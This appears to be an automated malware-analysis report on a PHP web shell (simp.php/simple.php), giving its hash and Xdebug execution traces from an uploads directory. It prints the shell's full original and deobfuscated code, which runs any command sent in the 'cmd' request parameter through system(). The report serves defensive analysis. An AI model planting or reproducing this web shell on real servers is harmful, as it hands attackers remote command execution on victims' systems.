PHP Malware Analysis

simp.php, simple.php

md5: 8f290d11549d11af9c94d39c974df35e

Attributes

Execution


Deobfuscated PHP code

<?php

if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
    die;
}

Execution traces

data/traces/8f290d11549d11af9c94d39c974df35e_trace-1676249673.4849.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:54:59.382690]
1	0	1	0.000157	393528
1	3	0	0.000210	394616	{main}	1		/var/www/html/uploads/simple.php	0	0
1	3	1	0.000227	394616
			0.000252	314240
TRACE END   [2023-02-12 22:54:59.382820]

data/traces/8f290d11549d11af9c94d39c974df35e_trace-1676256022.5586.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:40:48.456436]
1	0	1	0.000151	393512
1	3	0	0.000204	394592	{main}	1		/var/www/html/uploads/simp.php	0	0
1	3	1	0.000221	394592
			0.000244	314224
TRACE END   [2023-02-13 00:40:48.456560]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>